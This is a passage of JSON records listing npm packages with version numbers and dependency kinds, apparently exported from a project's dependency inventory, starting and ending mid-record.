minipass","ecosystem":"npm","requirements":"3.1.6","direct":false,"kind":"development","optional":false},{"id":93893208,"package_name":"mixin-deep","ecosystem":"npm","requirements":"1.3.2","direct":false,"kind":"development","optional":false},{"id":93893209,"package_name":"mocha","ecosystem":"npm","requirements":"5.2.0","direct":false,"kind":"development","optional":false},{"id":93893210,"package_name":"commander","ecosystem":"npm","requirements":"2.15.1","direct":false,"kind":"development","optional":false},{"id":93893211,"package_name":"debug","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93893212,"package_name":"glob","ecosystem":"npm","requirements":"7.1.2","direct":false,"kind":"development","optional":false},{"id":93893213,"package_name":"minimist","ecosystem":"npm","requirements":"0.0.8","direct":false,"kind":"development","optional":false},{"id":93893214,"package_name":"mkdirp","ecosystem":"npm","requirements":"0.5.1","direct":false,"kind":"development","optional":false},{"id":93893215,"package_name":"supports-color","ecosystem":"npm","requirements":"5.4.0","direct":false,"kind":"development","optional":false},{"id":93893216,"package_name":"mock-stdin","ecosystem":"npm","requirements":"0.3.1","direct":false,"kind":"development","optional":false},{"id":93893217,"package_name":"morgan","ecosystem":"npm","requirements":"1.9.1","direct":false,"kind":"development","optional":false},{"id":93893218,"package_name":"mustache","ecosystem":"npm","requirements":"2.3.2","direct":false,"kind":"development","optional":false},{"id":93893219,"package_name":"mute-stream","ecosystem":"npm","requirements":"0.0.8","direct":false,"kind":"development","optional":false},{"id":93893220,"package_name":"nan","ecosystem":"npm","requirements":"2.14.0","direct":false,"kind":"development","optional":false},{"id":93893221,"package_name":"nanomatch","ecosystem":"npm","requirements":"1.2.13","direct":false,"kind":"development","optional":false},{"id":93893222,"package_name":"arr-diff","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93893223,"package_name":"array-unique","ecosystem":"npm","requirements":"0.3.2","direct":false,"kind":"development","optional":false},{"id":93893224,"package_name":"natural-compare","ecosystem":"npm","requirements":"1.4.0","direct":false,"kind":"development","optional":false},{"id":93893225,"package_name":"negotiator","ecosystem":"npm","requirements":"0.6.2","direct":false,"kind":"development","optional":false},{"id":93893226,"package_name":"neo-async","ecosystem":"npm","requirements":"2.6.2","direct":false,"kind":"runtime","optional":false},{"id":93893227,"package_name":"nested-error-stacks","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893228,"package_name":"nice-try","ecosystem":"npm","requirements":"1.0.5","direct":false,"kind":"development","optional":false},{"id":93893229,"package_name":"nise","ecosystem":"npm","requirements":"1.5.3","direct":false,"kind":"development","optional":false},{"id":93893230,"package_name":"lolex","ecosystem":"npm","requirements":"5.1.2","direct":false,"kind":"development","optional":false},{"id":93893231,"package_name":"node-libs-browser","ecosystem":"npm","requirements":"0.7.0","direct":false,"kind":"development","optional":false},{"id":93893232,"package_name":"punycode","ecosystem":"npm","requirements":"1.4.1","direct":false,"kind":"development","optional":false},{"id":93893233,"package_name":"string_decoder","ecosystem":"npm","requirements":"0.10.31","direct":false,"kind":"development","optional":false},{"id":93893234,"package_name":"url","ecosystem":"npm","requirements":"0.11.0","direct":false,"kind":"development","optional":false},{"id":93893235,"package_name":"punycode","ecosystem":"npm","requirements":"1.3.2","direct":false,"kind":"development","optional":false},{"id":93893236,"package_name":"node-releases","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893237,"package_name":"nopt","ecosystem":"npm","requirements":"3.0.6","direct":false,"kind":"development","optional":false},{"id":93893238,"package_name":"normalize-package-data","ecosystem":"npm","requirements":"2.5.0","direct":false,"kind":"development","optional":false},{"id":93893239,"package_name":"normalize-path","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":93893240,"package_name":"npm-package-arg","ecosystem":"npm","requirements":"8.1.5","direct":false,"kind":"development","optional":false},{"id":93893241,"package_name":"hosted-git-info","ecosystem":"npm","requirements":"4.0.2","direct":false,"kind":"development","optional":false},{"id":93893242,"package_name":"npm-run-path","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":93893243,"package_name":"nyc","ecosystem":"npm","requirements":"14.1.1","direct":false,"kind":"development","optional":false},{"id":93893244,"package_name":"oauth-sign","ecosystem":"npm","requirements":"0.9.0","direct":false,"kind":"development","optional":false},{"id":93893245,"package_name":"object-assign","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893246,"package_name":"object-copy","ecosystem":"npm","requirements":"0.1.0","direct":false,"kind":"development","optional":false},{"id":93893247,"package_name":"object-keys","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93893248,"package_name":"object-visit","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893249,"package_name":"object.assign","ecosystem":"npm","requirements":"4.1.2","direct":false,"kind":"development","optional":false},{"id":93893250,"package_name":"object.defaults","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893251,"package_name":"for-own","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893252,"package_name":"object.map","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893253,"package_name":"object.omit","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893254,"package_name":"object.pick","ecosystem":"npm","requirements":"1.3.0","direct":false,"kind":"development","optional":false},{"id":93893255,"package_name":"on-finished","ecosystem":"npm","requirements":"2.3.0","direct":false,"kind":"development","optional":false},{"id":93893256,"package_name":"on-headers","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93893257,"package_name":"onetime","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":93893258,"package_name":"open","ecosystem":"npm","requirements":"0.0.5","direct":false,"kind":"development","optional":false},{"id":93893259,"package_name":"opencollective-postinstall","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":93893260,"package_name":"opn","ecosystem":"npm","requirements":"4.0.2","direct":false,"kind":"development","optional":false},{"id":93893261,"package_name":"optimist","ecosystem":"npm","requirements":"0.6.1","direct":false,"kind":"development","optional":false},{"id":93893262,"package_name":"minimist","ecosystem":"npm","requirements":"0.0.10","direct":false,"kind":"development","optional":false},{"id":93893263,"package_name":"wordwrap","ecosystem":"npm","requirements":"0.0.3","direct":false,"kind":"development","optional":false},{"id":93893264,"package_name":"optionator","ecosystem":"npm","requirements":"0.8.3","direct":false,"kind":"development","optional":false},{"id":93893265,"package_name":"os-browserify","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":93893266,"package_name":"os-locale","ecosystem":"npm","requirements":"1.4.0","direct":false,"kind":"development","optional":false},{"id":93893267,"package_name":"output-file-sync","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":93893268,"package_name":"p-finally","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893269,"package_name":"p-limit","ecosystem":"npm","requirements":"2.2.2","direct":false,"kind":"development","optional":false},{"id":93893270,"package_name":"p-locate","ecosystem":"npm","requirements":"4.1.0","direct":false,"kind":"development","optional":false},{"id":93893271,"package_name":"p-map","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893272,"package_name":"p-try","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":93893273,"package_name":"package-hash","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893274,"package_name":"pako","ecosystem":"npm","requirements":"0.2.9","direct":false,"kind":"development","optional":false},{"id":93893275,"package_name":"parent-module","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893276,"package_name":"parse-filepath","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93893277,"package_name":"parse-glob","ecosystem":"npm","requirements":"3.0.4","direct":false,"kind":"development","optional":false},{"id":93893278,"package_name":"parse-json","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93893279,"package_name":"parse-passwd","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893280,"package_name":"parseurl","ecosystem":"npm","requirements":"1.3.3","direct":false,"kind":"development","optional":false},{"id":93893281,"package_name":"parsimmon","ecosystem":"npm","requirements":"1.13.0","direct":false,"kind":"development","optional":false},{"id":93893282,"package_name":"pascalcase","ecosystem":"npm","requirements":"0.1.1","direct":false,"kind":"development","optional":false},{"id":93893283,"package_name":"path-browserify","ecosystem":"npm","requirements":"0.0.0","direct":false,"kind":"development","optional":false},{"id":93893284,"package_name":"path-exists","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93893285,"package_name":"path-key","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893286,"package_name":"path-parse","ecosystem":"npm","requirements":"1.0.7","direct":false,"kind":"development","optional":false},{"id":93893287,"package_name":"path-root","ecosystem":"npm","requirements":"0.1.1","direct":false,"kind":"development","optional":false},{"id":93893288,"package_name":"path-root-regex","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":93893289,"package_name":"path-to-regexp","ecosystem":"npm","requirements":"1.8.0","direct":false,"kind":"development","optional":false},{"id":93893290,"package_name":"isarray","ecosystem":"npm","requirements":"0.0.1","direct":false,"kind":"development","optional":false},{"id":93893291,"package_name":"path-type","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893292,"package_name":"pathval","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93893293,"package_name":"pbkdf2-compat","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893294,"package_name":"pend","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":93893295,"package_name":"performance-now","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893296,"package_name":"picocolors","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893297,"package_name":"picomatch","ecosystem":"npm","requirements":"2.3.1","direct":false,"kind":"development","optional":false},{"id":93893298,"package_name":"pify","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893299,"package_name":"pinkie","ecosystem":"npm","requirements":"2.0.4","direct":false,"kind":"development","optional":false},{"id":93893300,"package_name":"pinkie-promise","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893301,"package_name":"pirates","ecosystem":"npm","requirements":"4.0.4","direct":false,"kind":"development","optional":false},{"id":93893302,"package_name":"pixelmatch","ecosystem":"npm","requirements":"5.2.1","direct":false,"kind":"development","optional":false},{"id":93893303,"package_name":"pngjs","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":93893304,"package_name":"pkg-dir","ecosystem":"npm","requirements":"4.2.0","direct":false,"kind":"development","optional":false},{"id":93893305,"package_name":"playwright-core","ecosystem":"npm","requirements":"1.17.1","direct":false,"kind":"development","optional":false},{"id":93893306,"package_name":"agent-base","ecosystem":"npm","requirements":"6.0.2","direct":false,"kind":"development","optional":false},{"id":93893307,"package_name":"https-proxy-agent","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":93893308,"package_name":"please-upgrade-node","ecosystem":"npm","requirements":"3.2.0","direct":false,"kind":"development","optional":false},{"id":93893309,"package_name":"pngjs","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":93893310,"package_name":"portscanner","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":93893311,"package_name":"posix-character-classes","ecosystem":"npm","requirements":"0.1.1","direct":false,"kind":"development","optional":false},{"id":93893312,"package_name":"prelude-ls","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":93893313,"package_name":"preserve","ecosystem":"npm","requirements":"0.2.0","direct":false,"kind":"development","optional":false},{"id":93893314,"package_name":"prettier","ecosystem":"npm","requirements":"1.19.1","direct":false,"kind":"development","optional":false},{"id":93893315,"package_name":"pretty-bytes","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":93893316,"package_name":"pretty-format","ecosystem":"npm","requirements":"27.4.2","direct":false,"kind":"development","optional":false},{"id":93893317,"package_name":"private","ecosystem":"npm","requirements":"0.1.8","direct":false,"kind":"development","optional":false},{"id":93893318,"package_name":"process","ecosystem":"npm","requirements":"0.11.10","direct":false,"kind":"development","optional":false},{"id":93893319,"package_name":"progress","ecosystem":"npm","requirements":"2.0.3","direct":false,"kind":"development","optional":false},{"id":93893320,"package_name":"proper-lockfile","ecosystem":"npm","requirements":"4.1.2","direct":false,"kind":"development","optional":false},{"id":93893321,"package_name":"proxy-addr","ecosystem":"npm","requirements":"2.0.6","direct":false,"kind":"development","optional":false},{"id":93893322,"package_name":"proxy-from-env","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893323,"package_name":"prr","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893324,"package_name":"pseudomap","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93893325,"package_name":"psl","ecosystem":"npm","requirements":"1.7.0","direct":false,"kind":"development","optional":false},{"id":93893326,"package_name":"pump","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893327,"package_name":"punycode","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":93893328,"package_name":"q","ecosystem":"npm","requirements":"1.4.1","direct":false,"kind":"development","optional":false},{"id":93893329,"package_name":"qs","ecosystem":"npm","requirements":"6.5.2","direct":false,"kind":"development","optional":false},{"id":93893330,"package_name":"querystring","ecosystem":"npm","requirements":"0.2.0","direct":false,"kind":"development","optional":false},{"id":93893331,"package_name":"querystring-es3","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":93893332,"package_name":"querystringify","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":93893333,"package_name":"randomatic","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"development","optional":false},{"id":93893334,"package_name":"is-number","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93893335,"package_name":"range-parser","ecosystem":"npm","requirements":"1.2.1","direct":false,"kind":"development","optional":false},{"id":93893336,"package_name":"raw-body","ecosystem":"npm","requirements":"1.1.7","direct":false,"kind":"development","optional":false},{"id":93893337,"package_name":"react-is","ecosystem":"npm","requirements":"17.0.2","direct":false,"kind":"development","optional":false},{"id":93893338,"package_name":"read-pkg","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":93893339,"package_name":"read-pkg-up","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893340,"package_name":"find-up","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":93893341,"package_name":"path-exists","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893342,"package_name":"read-pkg","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893343,"package_name":"readdirp","ecosystem":"npm","requirements":"2.2.1","direct":false,"kind":"development","optional":false},{"id":93893344,"package_name":"braces","ecosystem":"npm","requirements":"2.3.2","direct":false,"kind":"development","optional":false},{"id":93893345,"package_name":"extend-shallow","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893346,"package_name":"expand-brackets","ecosystem":"npm","requirements":"2.1.4","direct":false,"kind":"development","optional":false},{"id":93893347,"package_name":"extglob","ecosystem":"npm","requirements":"2.0.4","direct":false,"kind":"development","optional":false},{"id":93893348,"package_name":"fill-range","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93893349,"package_name":"micromatch","ecosystem":"npm","requirements":"3.1.10","direct":false,"kind":"development","optional":false},{"id":93893350,"package_name":"recast","ecosystem":"npm","requirements":"0.10.33","direct":false,"kind":"development","optional":false},{"id":93893351,"package_name":"ast-types","ecosystem":"npm","requirements":"0.8.12","direct":false,"kind":"development","optional":false},{"id":93893352,"package_name":"rechoir","ecosystem":"npm","requirements":"0.7.1","direct":false,"kind":"development","optional":false},{"id":93893353,"package_name":"redent","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893354,"package_name":"regenerate","ecosystem":"npm","requirements":"1.4.0","direct":false,"kind":"development","optional":false},{"id":93893355,"package_name":"regenerator","ecosystem":"npm","requirements":"0.8.40","direct":false,"kind":"development","optional":false},{"id":93893356,"package_name":"regex-cache","ecosystem":"npm","requirements":"0.4.4","direct":false,"kind":"development","optional":false},{"id":93893357,"package_name":"regex-not","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93893358,"package_name":"regexpp","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893359,"package_name":"regexpu","ecosystem":"npm","requirements":"1.3.0","direct":false,"kind":"development","optional":false},{"id":93893360,"package_name":"esprima","ecosystem":"npm","requirements":"2.7.3","direct":false,"kind":"development","optional":false},{"id":93893361,"package_name":"regjsgen","ecosystem":"npm","requirements":"0.2.0","direct":false,"kind":"development","optional":false},{"id":93893362,"package_name":"regjsparser","ecosystem":"npm","requirements":"0.1.5","direct":false,"kind":"development","optional":false},{"id":93893363,"package_name":"release-zalgo","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893364,"package_name":"remove-trailing-separator","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893365,"package_name":"repeat-element","ecosystem":"npm","requirements":"1.1.3","direct":false,"kind":"development","optional":false},{"id":93893366,"package_name":"repeat-string","ecosystem":"npm","requirements":"1.6.1","direct":false,"kind":"development","optional":false},{"id":93893367,"package_name":"repeating","ecosystem":"npm","requirements":"1.1.3","direct":false,"kind":"development","optional":false},{"id":93893368,"package_name":"request","ecosystem":"npm","requirements":"2.88.2","direct":false,"kind":"development","optional":false},{"id":93893369,"package_name":"require-directory","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"runtime","optional":false},{"id":93893370,"package_name":"require-main-filename","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893371,"package_name":"requirejs","ecosystem":"npm","requirements":"2.3.6","direct":false,"kind":"development","optional":false},{"id":93893372,"package_name":"requires-port","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893373,"package_name":"resolve","ecosystem":"npm","requirements":"1.22.1","direct":false,"kind":"development","optional":false},{"id":93893374,"package_name":"resolve-dir","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893375,"package_name":"resolve-from","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93893376,"package_name":"resolve-url","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":93893377,"package_name":"restore-cursor","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93893378,"package_name":"ret","ecosystem":"npm","requirements":"0.1.15","direct":false,"kind":"development","optional":false},{"id":93893379,"package_name":"retry","ecosystem":"npm","requirements":"0.12.0","direct":false,"kind":"development","optional":false},{"id":93893380,"package_name":"reusify","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":93893381,"package_name":"right-align","ecosystem":"npm","requirements":"0.1.3","direct":false,"kind":"development","optional":false},{"id":93893382,"package_name":"rimraf","ecosystem":"npm","requirements":"2.6.3","direct":false,"kind":"development","optional":false},{"id":93893383,"package_name":"ripemd160","ecosystem":"npm","requirements":"0.2.0","direct":false,"kind":"development","optional":false},{"id":93893384,"package_name":"run-async","ecosystem":"npm","requirements":"2.4.0","direct":false,"kind":"development","optional":false},{"id":93893385,"package_name":"run-node","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893386,"package_name":"run-parallel","ecosystem":"npm","requirements":"1.1.9","direct":false,"kind":"development","optional":false},{"id":93893387,"package_name":"rxjs","ecosystem":"npm","requirements":"6.5.4","direct":false,"kind":"development","optional":false},{"id":93893388,"package_name":"safe-buffer","ecosystem":"npm","requirements":"5.2.1","direct":false,"kind":"development","optional":false},{"id":93893389,"package_name":"safe-json-parse","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893390,"package_name":"safe-regex","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893391,"package_name":"sax","ecosystem":"npm","requirements":"1.2.1","direct":false,"kind":"development","optional":false},{"id":93893392,"package_name":"semver-compare","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893393,"package_name":"send","ecosystem":"npm","requirements":"0.17.1","direct":false,"kind":"development","optional":false},{"id":93893394,"package_name":"http-errors","ecosystem":"npm","requirements":"1.7.3","direct":false,"kind":"development","optional":false},{"id":93893395,"package_name":"ms","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":93893396,"package_name":"serve-index","ecosystem":"npm","requirements":"1.9.1","direct":false,"kind":"development","optional":false},{"id":93893397,"package_name":"serve-static","ecosystem":"npm","requirements":"1.14.1","direct":false,"kind":"development","optional":false},{"id":93893398,"package_name":"set-value","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93893399,"package_name":"setimmediate","ecosystem":"npm","requirements":"1.0.5","direct":false,"kind":"development","optional":false},{"id":93893400,"package_name":"setprototypeof","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93893401,"package_name":"sha.js","ecosystem":"npm","requirements":"2.2.6","direct":false,"kind":"development","optional":false},{"id":93893402,"package_name":"shebang-command","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":93893403,"package_name":"shebang-regex","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893404,"package_name":"simple-fmt","ecosystem":"npm","requirements":"0.1.0","direct":false,"kind":"development","optional":false},{"id":93893405,"package_name":"simple-is","ecosystem":"npm","requirements":"0.2.0","direct":false,"kind":"development","optional":false},{"id":93893406,"package_name":"sinon","ecosystem":"npm","requirements":"7.5.0","direct":false,"kind":"development","optional":false},{"id":93893407,"package_name":"slash","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893408,"package_name":"slice-ansi","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93893409,"package_name":"slide","ecosystem":"npm","requirements":"1.1.6","direct":false,"kind":"development","optional":false},{"id":93893410,"package_name":"smart-buffer","ecosystem":"npm","requirements":"4.2.0","direct":false,"kind":"development","optional":false},{"id":93893411,"package_name":"snapdragon","ecosystem":"npm","requirements":"0.8.2","direct":false,"kind":"development","optional":false},{"id":93893412,"package_name":"snapdragon-node","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":93893413,"package_name":"snapdragon-util","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":93893414,"package_name":"sockjs","ecosystem":"npm","requirements":"0.3.20","direct":false,"kind":"development","optional":false},{"id":93893415,"package_name":"websocket-driver","ecosystem":"npm","requirements":"0.6.5","direct":false,"kind":"development","optional":false},{"id":93893416,"package_name":"sockjs-client","ecosystem":"npm","requirements":"1.4.0","direct":false,"kind":"development","optional":false},{"id":93893417,"package_name":"faye-websocket","ecosystem":"npm","requirements":"0.11.3","direct":false,"kind":"development","optional":false},{"id":93893418,"package_name":"socks","ecosystem":"npm","requirements":"2.6.1","direct":false,"kind":"development","optional":false},{"id":93893419,"package_name":"socks-proxy-agent","ecosystem":"npm","requirements":"6.1.1","direct":false,"kind":"development","optional":false},{"id":93893420,"package_name":"source-list-map","ecosystem":"npm","requirements":"0.1.8","direct":false,"kind":"development","optional":false},{"id":93893421,"package_name":"source-map","ecosystem":"npm","requirements":"0.6.1","direct":false,"kind":"runtime","optional":false},{"id":93893422,"package_name":"source-map-resolve","ecosystem":"npm","requirements":"0.5.3","direct":false,"kind":"development","optional":false},{"id":93893423,"package_name":"source-map-support","ecosystem":"npm","requirements":"0.2.10","direct":false,"kind":"development","optional":false},{"id":93893424,"package_name":"source-map","ecosystem":"npm","requirements":"0.1.32","direct":false,"kind":"development","optional":false},{"id":93893425,"package_name":"source-map-url","ecosystem":"npm","requirements":"0.4.0","direct":false,"kind":"development","optional":false},{"id":93893426,"package_name":"spawn-command","ecosystem":"npm","requirements":"0.0.2-1","direct":false,"kind":"development","optional":false},{"id":93893427,"package_name":"spawn-wrap","ecosystem":"npm","requirements":"1.4.3","direct":false,"kind":"development","optional":false},{"id":93893428,"package_name":"spdx-correct","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93893429,"package_name":"spdx-exceptions","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":93893430,"package_name":"spdx-expression-parse","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893431,"package_name":"spdx-license-ids","ecosystem":"npm","requirements":"3.0.5","direct":false,"kind":"development","optional":false},{"id":93893432,"package_name":"split-string","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93893433,"package_name":"sprintf-js","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":93893434,"package_name":"sshpk","ecosystem":"npm","requirements":"1.16.1","direct":false,"kind":"development","optional":false},{"id":93893435,"package_name":"ssri","ecosystem":"npm","requirements":"8.0.1","direct":false,"kind":"development","optional":false},{"id":93893436,"package_name":"stable","ecosystem":"npm","requirements":"0.1.8","direct":false,"kind":"development","optional":false},{"id":93893437,"package_name":"stack-utils","ecosystem":"npm","requirements":"2.0.5","direct":false,"kind":"development","optional":false},{"id":93893438,"package_name":"escape-string-regexp","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893439,"package_name":"static-extend","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":93893440,"package_name":"statuses","ecosystem":"npm","requirements":"1.5.0","direct":false,"kind":"development","optional":false},{"id":93893441,"package_name":"stream-browserify","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":93893442,"package_name":"stream-cache","ecosystem":"npm","requirements":"0.0.2","direct":false,"kind":"development","optional":false},{"id":93893443,"package_name":"stream-http","ecosystem":"npm","requirements":"2.8.3","direct":false,"kind":"development","optional":false},{"id":93893444,"package_name":"string-argv","ecosystem":"npm","requirements":"0.3.1","direct":false,"kind":"development","optional":false},{"id":93893445,"package_name":"string-template","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":93893446,"package_name":"string-width","ecosystem":"npm","requirements":"4.2.3","direct":false,"kind":"runtime","optional":false},{"id":93893447,"package_name":"stringify-object","ecosystem":"npm","requirements":"3.3.0","direct":false,"kind":"development","optional":false},{"id":93893448,"package_name":"stringmap","ecosystem":"npm","requirements":"0.2.2","direct":false,"kind":"development","optional":false},{"id":93893449,"package_name":"stringset","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":93893450,"package_name":"strip-ansi","ecosystem":"npm","requirements":"6.0.1","direct":false,"kind":"runtime","optional":false},{"id":93893451,"package_name":"strip-bom","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893452,"package_name":"strip-eof","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893453,"package_name":"strip-final-newline","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93893454,"package_name":"strip-indent","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93893455,"package_name":"supports-color","ecosystem":"npm","requirements":"5.5.0","direct":false,"kind":"development","optional":false},{"id":93893456,"package_name":"supports-preserve-symlinks-flag","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93893457,"package_name":"symbol-observable","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":93893458,"package_name":"table","ecosystem":"npm","requirements":"5.4.6","direct":false,"kind":"development","optional":false},{"id":93893459,"package_name":"tapable","ecosystem":"npm","requirements":"0.1.10","direct":false,"kind":"development","optional":false},{"id":93893460,"package_name":"tar","ecosystem":"npm","requirements":"2.2.2","direct":false,"kind":"development","optional":false},{"id":93893461,"package_name":"tar-stream","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":93893462,"package_name":"test-exclude","ecosystem":"npm","requirements":"5.2.3","direct":false,"kind":"development","optional":false},{"id":93893463,"package_name":"load-json-file","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93893464,"package_name":"path-type","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893465,"package_name":"read-pkg","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93893466,"package_name":"read-pkg-up","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93893467,"package_name":"text-table","ecosystem":"npm","requirements":"0.2.0","direct":false,"kind":"development","optional":false},{"id":93893468,"package_name":"through","ecosystem":"npm","req